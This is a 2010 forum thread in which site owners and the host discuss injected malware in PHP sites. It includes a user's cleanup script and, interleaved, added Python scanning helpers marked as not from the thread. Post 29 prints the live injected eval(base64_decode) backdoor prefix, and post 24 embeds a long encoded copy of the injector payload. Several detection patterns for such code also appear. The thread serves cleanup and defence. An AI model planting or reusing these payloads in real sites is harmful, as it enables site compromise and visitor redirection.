Site Hacked (59 posts)

  1. Steve D
    Member
    Posted 2 years ago #

    I think it's safe to assume that these attacks being launched upon the big hosts are of a new and different nature. They appear to be using techniques that are designed to overwhelm the servers in stealth by attacking every hole possible they can exploit quickly and efficiently. They are obviously targeting website owners who don't have their site secured according to reasonable protocols and are asleep at the wheel, doors open everywhere. Even more worrisome is the possibility of rogue accounts being set up.

    That would mean hosting providers are going to have to tighten up the requirements for shared hosting and impose a set of security standards one has to meet to get a shared hosting account. An application for shared hosting, so to speak.

  2. John Hoff
    Member
    Posted 2 years ago #

    Everyone, this is not a targeted WordPress attack, I don't think.

    It looks more like someone (or people) simply trying to hack PHP sites.

    That includes Joomla, osCommerce, Magento, Drupal, SMF, other forum software, chat software, etc.

    Restore your files and you should be good to go.

  3. Steve D
    Member
    Posted 2 years ago #

    WpBlogHost

    They are targeting everything and anything... and obviously succeeded.

    Rule Number One. Backup, Backup, Backup.

    Rule Number Two. Obey the first rule.

  4. ClaytonJames
    Member
    Posted 2 years ago #

    I am surprised - stunned actually - by the complete lack of any conversation regarding information gathered by (regularly) viewing or investigating access and error logs. I'm not certain which direction I should lean in when attempting to interpret what that might actually imply.

    Has anyone come across anything in their logs that set off any red flags for them? Not to single out GoDaddy, but, because they seem to be the topic of the moment... Does GoDaddy provide access to logs with their hosting plans?

  5. Steve D
    Member
    Posted 2 years ago #

    Latest from wpsecuritylock.com

    UPDATE 5/1/2010 at 3:09 pm (CST): We just found some mystery files and code.

    CAUTION: We just found some weird code in a WordPress wp-config.php file. This code was injected on April 21 on a site we are fixing now.

    $GLOBALS['mr_no'] = 1;

    We also found a mystery file in the root: test-soc.php, which contains the base64_decode script.

    Please check your websites for this now.

    If anyone has information as to what this is, please let us know.

  6. patrickcurl
    Member
    Posted 2 years ago #

    My sites have also been infiltrated. We're starting up a movement on Twitter to get GoDaddy to act on it; just tweet about your issue and use the hashtag #ihategodaddy. I'm @patrickcurl if you want to follow me.

    One trick in GoDaddy is to go to your hosting File Manager, click on History, select all your files and folders, and hit Restore; this will hopefully restore them to an earlier date.

    Takes some time if you have a lot of folders though, but you should then check all your files to make sure they are clean.

  7. redkathy
    Member
    Posted 2 years ago #

    That is what the April 21 attack did to the wp-config file. Today's attack was a different base64 code which redirected to a different site. I didn't see the [mr_no] this time; however, as soon as I got the redirect, I restored everything. It's not there now.

  8. Steve D
    Member
    Posted 2 years ago #

    The two common links here are these attacks are focused on shared hosting, in particular two of the biggest host providers.

    How are we supposed to secure our WordPress assets in this kind of environment? What's it going to take?

    I've done everything expected of a professional who takes their work seriously, and beyond: 18-hour days, 7 days a week, no time for play and goofing off.

    It almost seems like mission impossible at this point trying to secure the software.

  9. Steve D
    Member
    Posted 2 years ago #

    Most frustrating is trying to get information on what happened and how it happened.

  10. ClaytonJames
    Member
    Posted 2 years ago #

    Most frustrating is trying to get information on what happened and how it happened.

    Opinions seem to be all over the place, but I thought these to be the most coherent and well-organized aggregation of thoughts and opinions (in my own opinion) that I've seen so far on the whole situation.

    http://www.wpsecuritylock.com/cechriecom-com-script-wordpress-hacked-on-godaddy-case-study/

    http://www.wpsecuritylock.com/breaking-news-dangerous-malware-alert-self-hosted-sites-on-major-hosting-service-hacked-again/

    Perhaps some thought provoking information - as well as timely updates on the situation - could be found in those articles. I certainly see a couple of interesting links listed there.

  11. redkathy
    Member
    Posted 2 years ago #

    Can anyone say for certain it does not infiltrate the database files?

  12. Steve D
    Member
    Posted 2 years ago #

    Can anyone say for certain it does not infiltrate the database files?

    I believe it did cause some changes to be made in certain database tables on a few lines but nothing explosive. Something to do with a new url being placed in wp_options. I checked mine and that was clean. I don't know if this is happening in this situation.

    I was monitoring for intrusions since the week of April 7 when rumors began and thought I may have escaped up until the 18th when I and a bunch of other sites were hit. Cleaned up and was hit again on the 24th right after midnight. I am still monitoring because I have no conclusive evidence we are "all clear" yet.

  13. Steve D
    Member
    Posted 2 years ago #

    5 hours, 21 minutes ago: godaddy

    Recently some people have been seeing malware injections into their WordPress sites and even though they have attempted to clean it, the malicious code resurfaces. This is usually because either the source of the compromise (usually outdated WordPress versions or weak FTP passwords) was not fixed, or the malicious code was not fully removed.

    If you haven’t already, please read this message from our Chief Information Security Officer, Todd Redfoot http://community.godaddy.com/support/?ci=19370

    If you’re concerned you have been compromised with a malware script injection, you should search your content (the .php files WordPress uses) for anything that says "eval(base64_decode(" and remove that line.

    Many of these compromises also are accomplished by scripts adding users to WordPress and then injecting malicious code. You should review the users you have in your wp-admin control panel and make sure there aren’t any you didn’t intend to have.

    We have seen malware files in image directories such as wp-includes/js/tinymce/themes/advanced/skins/default/img/style.css.php

    There is a short term temporary fix, and that is to use the File Manager’s "History" feature to restore your site content to a date you know was before your site was compromised (this won’t affect posts). Steps are here: http://help.godaddy.com/article/5091 If however you do not see the "History" feature in the File Manager, please contact our support team 24/7 at 480-505-8877 for assistance restoring your site’s content.

    The permanent fix is to follow these steps to ensure it is fully cleaned and to prevent a recurrence. This is the best method to ensure it is 100% clean.

    1. Backup the database http://community.godaddy.com/help/2009/10/12/backing-up-and-restoring-mysql-or-mssql-databases/
    2. Make a note of the customizations, such as plugins or any other modifications you’ve made.
    3. Remove all files from the site, be sure to save anything that isn’t part of WordPress!
    4. Reinstall WordPress through Hosting Connections
    5. Restore the database (see the above article)
    6. Verify the WordPress users are correct and authorized
    7. Re-install any plugins you were using
    8. Reload any additional .php files from known clean copy

    This is the best way to ensure the site was not attacked previously and has hidden backdoors loaded deep into the site.

    It is extremely important to keep your WordPress software up to date and use strong passwords for your WP admin, FTP and Database, and that you don’t use the same password for all of them.

    If you have WordPress installed on your hosting account but are not using it, we recommend removing it.

  14. ClaytonJames
    Member
    Posted 2 years ago #

    Some GoDaddy link-a-fication goodness for ya'.

    Sorta' like forum shorthand. :-)

    WordPress Compromised? How to fix it!

    Customer Communications

  15. redkathy
    Member
    Posted 2 years ago #

    I believe it did cause some changes to be made in certain database tables on a few lines but nothing explosive. Something to do with a new url being placed in wp_options. I checked mine and that was clean. I don't know if this is happening in this situation.

    How do you check the db files? Download, change to .txt and read?

  16. John Hoff
    Member
    Posted 2 years ago #

    @Steve D - GoDaddy gave some decent advice there, but it's probably only good for people like us who know how to do this stuff in our sleep.

    To those who don't know much about all this, please be very careful if you plan to delete / replace files and databases. Always make sure you back up both your files in your File Manager and also your database before attempting anything.

    If you're not sure what to do or how to do it, consult a WordPress service tech.

    Also, check out this plugin to help thwart the base64 hack.
    http://wordpress.org/extend/plugins/block-bad-queries/

    But realize that if the hack is coming through someone hacking the web hosting company (and not necessarily your blog), there's little you can do to stop the hacker.

    In this case, the best you can do is be prepared by:
    - setting up a file monitoring service (I like the WordPress File Monitor plugin)
    - using the 4G Blacklist .htaccess rules (see my earlier comment)
    - keeping full backups of your hosting files and your database regularly
    - installing the WordPress Firewall Plugin
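A simple form of the file monitoring John Hoff recommends, written here as an added example (it is not the plugin he mentions and not code from this thread): take a SHA-256 baseline of the site's files, keep that manifest somewhere the web server cannot write to, and diff a fresh manifest against it later. The skip list for volatile directories and the constructed sample site layout are assumptions.

```python
import hashlib
import json
import tempfile
from pathlib import Path


def hash_file(path, chunk=65536):
    """SHA-256 of a file, read in chunks so large uploads are not loaded whole."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root, skip_dirs=("wp-content/uploads", "wp-content/cache")):
    """Map each file's path (relative to root, POSIX form) to its SHA-256.

    skip_dirs is an assumed list of directories that change during normal use.
    """
    root = Path(root)
    manifest = {}
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        if any(rel == d or rel.startswith(d + "/") for d in skip_dirs):
            continue
        manifest[rel] = hash_file(p)
    return manifest


def save_manifest(manifest, out_path):
    Path(out_path).write_text(json.dumps(manifest, indent=1, sort_keys=True))


def load_manifest(in_path):
    return json.loads(Path(in_path).read_text())


def diff_manifest(baseline, current):
    """Return sorted lists of added, removed and modified relative paths."""
    base_keys, cur_keys = set(baseline), set(current)
    return {
        "added": sorted(cur_keys - base_keys),
        "removed": sorted(base_keys - cur_keys),
        "modified": sorted(k for k in base_keys & cur_keys if baseline[k] != current[k]),
    }


def demo():
    """Constructed site: take a baseline, simulate a compromise, report the difference."""
    site = Path(tempfile.mkdtemp())
    (site / "wp-includes").mkdir()
    (site / "index.php").write_text("<?php require 'wp-blog-header.php';\n")
    (site / "wp-includes" / "version.php").write_text("<?php $wp_version = 'x';\n")
    (site / "wp-settings.php").write_text("<?php // settings\n")
    baseline = build_manifest(site)
    # The baseline belongs off the host; here it simply goes to a second temp dir.
    manifest_path = Path(tempfile.mkdtemp()) / "baseline.json"
    save_manifest(baseline, manifest_path)
    # Simulated changes: one file gets a prefix, one is dropped in, one disappears.
    idx = site / "index.php"
    idx.write_text("<?php /* injected prefix (constructed) */ ?>" + idx.read_text())
    (site / "wp-includes" / "style.css.php").write_text("<?php // dropped file (constructed)\n")
    (site / "wp-settings.php").unlink()
    return diff_manifest(load_manifest(manifest_path), build_manifest(site))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Run the baseline right after a clean install or a restore from a known-good backup, then rerun the comparison on a schedule (a cron job works on hosts that allow one). A manifest stored on the same account offers little, since whoever can rewrite every .php file can rewrite the manifest too.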

  17. John Hoff
    Member
    Posted 2 years ago #

    @redkathy - you can export your database. Make sure it's a .sql file before viewing... if it's a zip file, unzip it first.

    Then use a program like WordPad to open the file so you can view it.

    You can then do a Find search for whatever it is you're looking for.
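As an added example of what to look for once the .sql export is open (this is not John Hoff's code or any WordPress tool): parse the wp_options rows out of a mysqldump file, compare the siteurl and home values against the URL you expect, and flag option values carrying script tags or base64_decode calls, which is the kind of wp_options change Steve D describes earlier in the thread. The dump excerpt is constructed, and the table prefix and expected URL are assumptions.

```python
import re

# Constructed mysqldump excerpt for the demo; this is not a real site's data.
SAMPLE_DUMP = r"""-- constructed mysqldump excerpt (not real data)
INSERT INTO `wp_options` VALUES (1,'siteurl','http://example.com','yes'),(2,'home','http://example.com/','yes'),(3,'blogname','Steve\'s Blog','yes'),(4,'widget_text','a:1:{s:4:\"text\";s:52:\"<script src=\"http://injected.example/x.js\"></script>\";}','yes');
INSERT INTO `wp_posts` VALUES (1,'post','hello');
"""

# Substrings that do not belong in wp_options values on a normal site.
SUSPICIOUS = ("<script", "<iframe", "base64_decode", "eval(", "document.write")

INSERT_RE = re.compile(r"INSERT INTO `(\w+)` VALUES (.*?);\s*$", re.MULTILINE | re.DOTALL)


def parse_rows(values_text):
    """Split a dump's VALUES body into rows of fields.

    Quoted strings may contain backslash escapes (backslash-quote and
    backslash-backslash); other escapes are reduced to the escaped character.
    """
    rows, i, n = [], 0, len(values_text)
    while i < n:
        if values_text[i] != "(":
            i += 1
            continue
        i += 1
        row = []
        while True:
            while values_text[i] == " ":
                i += 1
            if values_text[i] == "'":
                i += 1
                buf = []
                while values_text[i] != "'":
                    if values_text[i] == "\\":
                        i += 1
                    buf.append(values_text[i])
                    i += 1
                i += 1
                row.append("".join(buf))
            else:
                j = i
                while values_text[j] not in ",)":
                    j += 1
                row.append(values_text[i:j].strip())
                i = j
            if values_text[i] == ",":
                i += 1
            else:
                i += 1  # closing parenthesis ends the row
                break
        rows.append(row)
    return rows


def check_wp_options(dump_text, expected_url, prefix="wp_"):
    """Return (urls, alerts): siteurl/home values and a list of (option, reason)."""
    urls, alerts = {}, []
    for m in INSERT_RE.finditer(dump_text):
        if m.group(1) != prefix + "options":
            continue
        for row in parse_rows(m.group(2)):
            if len(row) < 3:
                continue
            name, value = row[1], row[2]  # (option_id, option_name, option_value, autoload)
            if name in ("siteurl", "home"):
                urls[name] = value
                if value.rstrip("/") != expected_url.rstrip("/"):
                    alerts.append((name, "unexpected URL: " + value))
            low = value.lower()
            for needle in SUSPICIOUS:
                if needle in low:
                    alerts.append((name, "contains " + needle))
                    break
    return urls, alerts


if __name__ == "__main__":
    found, problems = check_wp_options(SAMPLE_DUMP, "http://example.com")
    print(found)
    for option, reason in problems:
        print("ALERT %s: %s" % (option, reason))
```

On a real export, read the whole file in and pass it to check_wp_options with the site's own prefix and URL; a hit on siteurl or home is the redirect symptom redkathy describes, and a hit inside a widget or theme option is content that a file restore alone will not remove.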

  18. redkathy
    Member
    Posted 2 years ago #

    @WpBlogHost - Thanks for the instruction. The first attack I was so very lost; it took forever to clean the sites. This time not so bad. I hope we don't get used to doing this :(

  19. redkathy
    Member
    Posted 2 years ago #

    @WpBlogHost - export and back up file, the same thing?

  20. John Hoff
    Member
    Posted 2 years ago #

    Yes.

  21. Steve D
    Member
    Posted 2 years ago #

    Worth the read...

    Anonymous said...

    I was called in to look at some hosting servers at a small company that got hit with something similar to this earlier this year. Their hosted sites were php, asp and coldfusion sites (no wordpress, joomla or any sort of control panel). All index/home/main/default files - regardless of whether they were php, asp, cfm or even html had various javascripts included. It certainly looked like it was an FTP exploit with either privilege escalation so their bot could traverse user directories and write, or they somehow got the ftp user/pass db. Logs did not indicate brute force attacks. File changes came from multiple locations around the world.

  22. Go Daddy
    Member
    Posted 2 years ago #

    All,

    We've posted instructions for fixing the issue at http://fwd4.me/MFK. Please make sure that you follow all of the steps, including the 'permanent fix'.

    Salem

  23. qab
    Member
    Posted 2 years ago #

    OK, the solution GoDaddy is giving, respectfully, is useless.

    My website has Joomla installed and is hosted on a GoDaddy server. I'm proud to say I have completely removed the virus using my own scripting skills; all it took was 10 mins. The virus is hardly that; it's just code that somehow bypassed GoDaddy's security and was able to write itself to all PHP files.

  24. qab
    Member
    Posted 2 years ago #

    This is the script I developed and used with success.
    It's kind of tricky; you need to do a couple of things before using the script.

    Run this command in the SSH: find . -name "*.php" -type f -print

    That will display all PHP files in your directory, including subdirectories.

    If you don't know how to execute it, just use a cron job; it should email it to you with no problem.

    Now you save it in a txt file named "php.txt".

    Upload php.txt with anything.php; anything.php contains the following:
    (please change what I ask you to change)
    The script isn't perfect but should do the job.

    Only use this as a last resort, and back up your website before use as well, just in case.

    <?php
    // php.txt holds the output of: find . -name "*.php" -type f -print
    $files = file_get_contents('php.txt');

    $afiles = explode("\n", $files);

    for ($i = 0; $i < count($afiles); $i++) { // you might want to lessen the loops if your website is big
        qabandi($afiles[$i]);
    }

    function qabandi($file) {
        $file = trim($file);
        if ($file === '') { return; }              // skip blank lines in php.txt
        $sick = "{rest of location}" . $file;      // this is where you add the rest of location
        if (!is_file($sick)) { echo($sick . "[not found]\n"); return; }
        $content = file_get_contents($sick);

        $clean = str_replace(bad(), "", $content); // remove the injected block returned by bad()
        if ($clean === $content) { echo($sick . "[nothing to remove]\n"); return; }

        $handle = fopen($sick, "w+");
        fwrite($handle, $clean);
        fclose($handle);
        echo($sick . "[cleaned]\n");
    }

     function bad(){ return base64_decode("PD9waHAgLyoqLyBldmFsKGJhc2U2NF9kZWNvZGUoImFXWW9ablZ1WTNScGIyNWZaWGhwYzNSektD
    ZHZZbDl6ZEdGeWRDY3BKaVloYVhOelpYUW9KRWRNVDBKQlRGTmJKMjF5WDI1dkoxMHBLWHNnSUNB
    a1IweFBRa0ZNVTFzbmJYSmZibThuWFQweE95QWdJR2xtS0NGbWRXNWpkR2x2Ymw5bGVHbHpkSE1v
    SjIxeWIySm9KeWtwZXlBZ0lDQWdJR2xtS0NGbWRXNWpkR2x2Ymw5bGVHbHpkSE1vSjJkdGJDY3BL
    WHNnSUNBZ0lHWjFibU4wYVc5dUlHZHRiQ2dwZXlBZ0lDQWdJR2xtSUNnaGMzUnlhWE4wY2lna1gx
    TkZVbFpGVWxzaVNGUlVVRjlWVTBWU1gwRkhSVTVVSWwwc0ltZHZiMmRzWldKdmRDSXBKaVlnS0NG
    emRISnBjM1J5S0NSZlUwVlNWa1ZTV3lKSVZGUlFYMVZUUlZKZlFVZEZUbFFpWFN3aWVXRm9iMjhp
    S1NrcGV5QWdJQ0FnSUNCeVpYUjFjbTRnWW1GelpUWTBYMlJsWTI5a1pTZ2lVRWhPYW1OdGJIZGtR
    MEo2WTIxTk9VbHRhREJrU0VFMlRIazVjbHBIY0hKYWJYQjZZVEpTYldGdGVIcGhNbEp4V21rMWFt
    SXlNSFpoTTBGMVkwZG9kMGxxTkRoTU0wNXFZMjFzZDJSRU5EMGlLVHNnSUNBZ0lDQjlJQ0FnSUNB
    Z2NtVjBkWEp1SUNJaU95QWdJQ0FnZlNBZ0lDQjlJQ0FnSUNBZ0lDQnBaaWdoWm5WdVkzUnBiMjVm
    WlhocGMzUnpLQ2RuZW1SbFkyOWtaU2NwS1hzZ0lDQWdJR1oxYm1OMGFXOXVJR2Q2WkdWamIyUmxL
    Q1JTTlVFNVEwWXhRalE1TnpVd01rRkRRVEl6UXpoR05qRXhRVFUyTkRZNE5FTXBleUFnSUNBZ0lD
    UlNNekJDTWtGQ09FUkRNVFE1TmtRd05rSXlNekJCTnpGRU9EazJNa0ZHTlVROVFHOXlaQ2hBYzNW
    aWMzUnlLQ1JTTlVFNVEwWXhRalE1TnpVd01rRkRRVEl6UXpoR05qRXhRVFUyTkRZNE5FTXNNeXd4
    S1NrN0lDQWdJQ0FnSkZKQ1JUUkRORVF3TXpkRk9UTTVNakkyUmpZMU9ERXlPRGcxUVRVelJFRkVP
    VDB4TURzZ0lDQWdJQ0FrVWtFelJEVXlSVFV5UVRRNE9UTTJRMFJGTUVZMU16VTJRa0l3T0RZMU1r
    WXlQVEE3SUNBZ0lDQWdhV1lvSkZJek1FSXlRVUk0UkVNeE5EazJSREEyUWpJek1FRTNNVVE0T1RZ
    eVFVWTFSQ1kwS1hzZ0lDQWdJQ0FnSkZJMk0wSkZSRVUyUWpFNU1qWTJSRFJGUmtWQlJEQTNRVFJF
    T1RGRk1qbEZRajFBZFc1d1lXTnJLQ2QySnl4emRXSnpkSElvSkZJMVFUbERSakZDTkRrM05UQXlR
    VU5CTWpORE9FWTJNVEZCTlRZME5qZzBReXd4TUN3eUtTazdJQ0FnSUNBZ0lDUlNOak5DUlVSRk5r
    SXhPVEkyTmtRMFJVWkZRVVF3TjBFMFJEa3hSVEk1UlVJOUpGSTJNMEpGUkVVMlFqRTVNalkyUkRS
    RlJrVkJSREEzUVRSRU9URkZNamxGUWxzeFhUc2dJQ0FnSUNBZ0pGSkNSVFJETkVRd016ZEZPVE01
    TWpJMlJqWTFPREV5T0RnMVFUVXpSRUZFT1NzOU1pc2tVall6UWtWRVJUWkNNVGt5TmpaRU5FVkdS
    VUZFTURkQk5FUTVNVVV5T1VWQ095QWdJQ0FnSUgwZ0lDQWdJQ0JwWmlna1VqTXdRakpCUWpoRVF6
    RTBPVFpFTURaQ01qTXdRVGN4UkRnNU5qSkJSalZFSmpncGV5QWdJQ0FnSUNBa1VrSkZORU0wUkRB
    ek4wVTVNemt5TWpaR05qVTRNVEk0T0RWQk5UTkVRVVE1UFVCemRISndiM01vSkZJMVFUbERSakZD
    TkRrM05UQXlRVU5CTWpORE9FWTJNVEZCTlRZME5qZzBReXhqYUhJb01Da3NKRkpDUlRSRE5FUXdN
    emRGT1RNNU1qSTJSalkxT0RFeU9EZzFRVFV6UkVGRU9Ta3JNVHNnSUNBZ0lDQjlJQ0FnSUNBZ2FX
    WW9KRkl6TUVJeVFVSTRSRU14TkRrMlJEQTJRakl6TUVFM01VUTRPVFl5UVVZMVJDWXhOaWw3SUNB
    Z0lDQWdJQ1JTUWtVMFF6UkVNRE0zUlRrek9USXlOa1kyTlRneE1qZzROVUUxTTBSQlJEazlRSE4w
    Y25CdmN5Z2tValZCT1VOR01VSTBPVGMxTURKQlEwRXlNME00UmpZeE1VRTFOalEyT0RSRExHTm9j
    aWd3S1N3a1VrSkZORU0wUkRBek4wVTVNemt5TWpaR05qVTRNVEk0T0RWQk5UTkVRVVE1S1NzeE95
    QWdJQ0FnSUgwZ0lDQWdJQ0JwWmlna1VqTXdRakpCUWpoRVF6RTBPVFpFTURaQ01qTXdRVGN4UkRn
    NU5qSkJSalZFSmpJcGV5QWdJQ0FnSUNBa1VrSkZORU0wUkRBek4wVTVNemt5TWpaR05qVTRNVEk0
    T0RWQk5UTkVRVVE1S3oweU95QWdJQ0FnSUgwZ0lDQWdJQ0FrVWpBek5FRkZNa0ZDT1RSR09UbERR
    emd4UWpNNE9VRXhPREl5UkVFek16VXpQVUJuZW1sdVpteGhkR1VvUUhOMVluTjBjaWdrVWpWQk9V
    TkdNVUkwT1RjMU1ESkJRMEV5TTBNNFJqWXhNVUUxTmpRMk9EUkRMQ1JTUWtVMFF6UkVNRE0zUlRr
    ek9USXlOa1kyTlRneE1qZzROVUUxTTBSQlJEa3BLVHNnSUNBZ0lDQnBaaWdrVWpBek5FRkZNa0ZD
    T1RSR09UbERRemd4UWpNNE9VRXhPREl5UkVFek16VXpQVDA5UmtGTVUwVXBleUFnSUNBZ0lDQWtV
    akF6TkVGRk1rRkNPVFJHT1RsRFF6Z3hRak00T1VFeE9ESXlSRUV6TXpVelBTUlNOVUU1UTBZeFFq
    UTVOelV3TWtGRFFUSXpRemhHTmpFeFFUVTJORFk0TkVNN0lDQWdJQ0FnZlNBZ0lDQWdJSEpsZEhW
    eWJpQWtVakF6TkVGRk1rRkNPVFJHT1RsRFF6Z3hRak00T1VFeE9ESXlSRUV6TXpVek95QWdJQ0Fn
    ZlNBZ0lDQjlJQ0FnSUdaMWJtTjBhVzl1SUcxeWIySm9LQ1JTUlRneVJVVTVRakV5TVVZM01EazRP
    VFZGUmpVMFJVSkJOMFpCTmtJM09FSXBleUFnSUNBZ1NHVmhaR1Z5S0NkRGIyNTBaVzUwTFVWdVky
    OWthVzVuT2lCdWIyNWxKeWs3SUNBZ0lDQWtVa0V4TnpsQlFrUXpRVGRDT1VVeU9FTXpOamxHTjBJ
    MU9VTTFNVUk0TVVSRlBXZDZaR1ZqYjJSbEtDUlNSVGd5UlVVNVFqRXlNVVkzTURrNE9UVkZSalUw
    UlVKQk4wWkJOa0kzT0VJcE95QWdJQ0FnSUNCcFppaHdjbVZuWDIxaGRHTm9LQ2N2WER4Y0wySnZa
    SGt2YzJrbkxDUlNRVEUzT1VGQ1JETkJOMEk1UlRJNFF6TTJPVVkzUWpVNVF6VXhRamd4UkVVcEtY
    c2dJQ0FnSUNCeVpYUjFjbTRnY0hKbFoxOXlaWEJzWVdObEtDY3ZLRnc4WEM5aWIyUjVXMTVjUGww
    cVhENHBMM05wSnl4bmJXd29LUzRpWEc0aUxpY2tNU2NzSkZKQk1UYzVRVUpFTTBFM1FqbEZNamhE
    TXpZNVJqZENOVGxETlRGQ09ERkVSU2s3SUNBZ0lDQjlaV3h6WlhzZ0lDQWdJQ0J5WlhSMWNtNGdK
    RkpCTVRjNVFVSkVNMEUzUWpsRk1qaERNelk1UmpkQ05UbEROVEZDT0RGRVJTNW5iV3dvS1RzZ0lD
    QWdJSDBnSUNBZ2ZTQWdJQ0J2WWw5emRHRnlkQ2duYlhKdlltZ25LVHNnSUNCOUlDQjkiKSk7Pz4=");}function good(){return base64_decode("PD9QSFAgLyphbC1xYWJhbmRpQGhvdG1haWwuY29tKi8gPz4=");}
    
    ?>

  25. Steve D
    Member
    Posted 2 years ago #

    These criminals have discovered serious vulnerabilities in many popular hosting companies, and these companies must step up their effort to protect their customers.

    That's really the bottom line.

  26. petercasier
    Member
    Posted 2 years ago #

    In the meantime, it is clear that not only WP sites were attacked on GoDaddy (I run a Drupal site, and it was attacked too). The "base64_decode" line was injected into every single .PHP file.

    While it is clear how to restore the site, what I have not seen so far is what GoDaddy is doing to recognize that the problem is not WP or any other CMS, but a vulnerability on their side.

    You can't cure a sick person if the sick person does not recognize he is sick.

    Peter

  27. qab
    Member
    Posted 2 years ago #

    Yes, I agree, petercasier. It is not a vulnerability in WordPress, Joomla or Drupal; it's a vulnerability in GoDaddy itself as a host. This is very disappointing, I must say.

  28. helpme11
    Member
    Posted 2 years ago #

    Can anyone locate where these hackers are from?!

    This is not funny!!

  29. Robbo Mills
    Member
    Posted 2 years ago #

    I also got hacked. ALL the .php files on my site(s) are infected with the following:

    <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzEvZDE3MjUyNDQ1Mi9odGRvY3MvYmxvZy93cC1pbmNsdWRlcy9qcy90aW55bWNlL3BsdWdpbnMvaW5saW5lcG9wdXBzL3NraW5zL2NsZWFybG9va3MyL2ltZy9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>

    And there were some strange additions to the .htaccess file in the logs folder. I'm hosted by 1and1.com and have sent them a ticket on this but haven't heard back yet. From what I've read here it's not just WordPress and it's also pretty widespread.

    What ticks me off is the amount of work I had to do for just ONE of my blogs to clean up this crap (including replacing the MySQL database) and I can't bear the thought of having to do that for EACH AND EVERY ONE of my other sites.

    Is there some kind of script or some mojo thingee that can grind through all this and remove it? I'm not enough of a code monkey to figure it out myself - I only know enough to screw things up unless I have very clear instructions.

    Anyone? Anyone? Bueller?

    thanks
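GoDaddy's advice in post 13 (search the .php files for eval(base64_decode( and remove that line), qab's find-plus-cleanup approach in post 24, and Robbo Mills' request just above for something that grinds through every file, as one added example that is not from this thread, from any host, or from any plugin: a Python scanner that reports the injected wrapper, the $GLOBALS['mr_no'] marker and double-extension names like style.css.php, decodes payloads only to show a preview for triage, and strips only exact matches of the wrapper after saving a .bak copy. The sample site it builds is constructed, and the regular expressions are assumptions modelled on the samples quoted in the thread.

```python
import base64
import re
import tempfile
from pathlib import Path

# The wrapper quoted in the thread: "<?php /**/eval(base64_decode('...')); ?>".
# Only this exact shape is removed automatically; anything looser is reported.
INJECT_RE = re.compile(
    r"<\?php\s*/\*\*/\s*eval\(base64_decode\(\s*['\"]([A-Za-z0-9+/=\s]+?)['\"]\s*\)\);\s*\?>"
)
# Any eval(base64_decode( call, reported for manual review.
LOOSE_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(")
# Marker wpsecuritylock reported in wp-config.php.
MARKER_RE = re.compile(r"\$GLOBALS\s*\[\s*['\"]mr_no['\"]\s*\]\s*=")
# Double extensions like style.css.php, the dropped-file name quoted by GoDaddy.
ODD_NAME_RE = re.compile(r"\.(css|js|jpe?g|gif|png)\.php$", re.IGNORECASE)


def decode_preview(b64, limit=80):
    """Decode a payload for triage only (it is never executed); printable ASCII."""
    try:
        raw = base64.b64decode(b64)
    except (ValueError, TypeError):
        return "<undecodable>"
    text = raw.decode("latin-1")
    return "".join(ch if 32 <= ord(ch) < 127 else "." for ch in text)[:limit]


def _line_of(text, pos):
    return text.count("\n", 0, pos) + 1


def scan_file(path):
    """Return (path, line, kind, detail) findings for one file; line 0 = whole file."""
    path = Path(path)
    findings = []
    if ODD_NAME_RE.search(path.name):
        findings.append((str(path), 0, "suspicious double extension", path.name))
    text = path.read_text(encoding="utf-8", errors="replace")
    spans = []
    for m in INJECT_RE.finditer(text):
        spans.append(m.span())
        findings.append((str(path), _line_of(text, m.start()),
                         "injected eval(base64_decode) prefix", decode_preview(m.group(1))))
    for m in LOOSE_RE.finditer(text):
        if not any(a <= m.start() < b for a, b in spans):
            findings.append((str(path), _line_of(text, m.start()),
                             "eval(base64_decode) call (manual review)", ""))
    for m in MARKER_RE.finditer(text):
        findings.append((str(path), _line_of(text, m.start()),
                         "$GLOBALS['mr_no'] marker", ""))
    return findings


def scan_tree(root, exts=(".php",)):
    """Scan every file under root whose name ends with one of exts."""
    findings = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.name.endswith(exts):
            findings.extend(scan_file(p))
    return findings


def clean_file(path):
    """Strip exact wrapper matches after saving a .bak copy; return count removed."""
    path = Path(path)
    text = path.read_text(encoding="utf-8", errors="replace")
    cleaned, n = INJECT_RE.subn("", text)
    if n:
        path.with_name(path.name + ".bak").write_text(text, encoding="utf-8")
        path.write_text(cleaned, encoding="utf-8")
    return n


def build_sample_site(root):
    """Constructed sample files (not a real infection) carrying a harmless payload."""
    root = Path(root)
    payload = base64.b64encode(b'echo "constructed sample payload";').decode()
    wrapper = "<?php /**/eval(base64_decode('%s')); ?>" % payload
    (root / "index.php").write_text(wrapper + "<?php\necho 'site';\n", encoding="utf-8")
    (root / "clean.php").write_text("<?php\necho 'fine';\n", encoding="utf-8")
    (root / "wp-config.php").write_text(
        "<?php\n$GLOBALS['mr_no'] = 1;\ndefine('DB_NAME', 'x');\n", encoding="utf-8")
    img = root / "wp-includes" / "img"
    img.mkdir(parents=True)
    (img / "style.css.php").write_text("<?php\n// constructed dropped file\n", encoding="utf-8")
    return root


def demo():
    """Scan, clean and rescan the constructed site; return (root, before, removed, after)."""
    root = build_sample_site(tempfile.mkdtemp())
    before = scan_tree(root)
    removed = sum(clean_file(p) for p in sorted(root.rglob("*.php")))
    after = scan_tree(root)
    return root, before, removed, after


if __name__ == "__main__":
    root, before, removed, after = demo()
    for f in before:
        print("%s:%d %s %s" % f)
    print("removed %d wrapper(s); %d finding(s) still need review" % (removed, len(after)))
```

Point scan_tree at the account's web root to get the report first; run clean_file only on the reported files, and treat anything left in the report (the wp-config marker, dropped files under image directories, eval calls in other shapes) as a reason to follow the full reinstall steps from post 13 rather than editing by hand. Where a restore point from before the compromise exists, the thread's advice to restore and then rescan still applies.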

